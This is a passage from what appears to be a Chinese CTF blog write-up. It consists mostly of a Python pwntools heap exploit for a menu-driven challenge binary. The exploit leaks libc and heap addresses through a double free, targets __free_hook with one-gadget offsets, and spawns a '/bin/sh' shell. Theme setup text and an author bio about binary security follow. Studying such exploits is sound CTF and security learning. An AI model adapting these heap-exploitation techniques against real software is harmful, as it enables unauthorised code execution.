    p.sendlineafter('name? ',str(name))

def Set(name, off, val):
    p.sendlineafter('Choice: ', str(5))
    p.sendlineafter('name? ', name)
    p.sendlineafter('off val', str(off))
    p.sendline(str(val))

def View():
    p.sendlineafter('Choice: ', str(6))

gadgets = [0x4f365, 0x4f3c2, 0x10a45c]

def Pwn():
    for i in range(9):
        New(types[8], str(i)*0x20)


    for i in range(7):
        Delete(str(i)*0x20)
    #gdb.attach(p, 'bp 0x4032bb')
    Clone('7'*0x20)
    Delete(str(7)*0x20)

    New(types[8], '9'*0x20)

    View()
    p.recvuntil('->')
    libc_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))-320-libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr))

    free_hook = libc_addr+libc.sym['__free_hook']
    system = libc_addr + libc.sym['system']
    print('free_hook:',hex(free_hook))

    print("double free")
    New(types[8], 'a'*8)


    Clone('a'*8)
    Delete('a'*8)

    print("leak heap_addr")
    View()
    p.recvuntil('->')
    heap_addr = u64(p.recv(0x20)[0x10:0x18])
    print('heap_addr:',hex(heap_addr))

    #Get()
    Delete('a'*8)
    gadget = gadgets[1] + libc_addr
    payload = (p64(heap_addr-0x1210+0x20)+p64(heap_addr-0x1210+0x18)+p64(8)+'/bin/sh'+";")+p64(gadget)+"||/bin/sh"
    payload = payload.ljust(0xe0, b'\x00')
    New(types[8], payload)

    #gadget = gadgets[0]+libc_addr
    payload = '/bin/sh'+";"+p64(gadget)+"||/bin/sh"
    payload = payload.ljust(0xd0,b'\x00')+p64(0x7d1)+p64(0)
    Get(payload)

    p.interactive()

Pwn()

只要你支持她,我们就是好朋友2333

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

主要研究:
二进制安全、漏洞挖掘
CTF菜鸡一只

天枢Dubhe 学习ing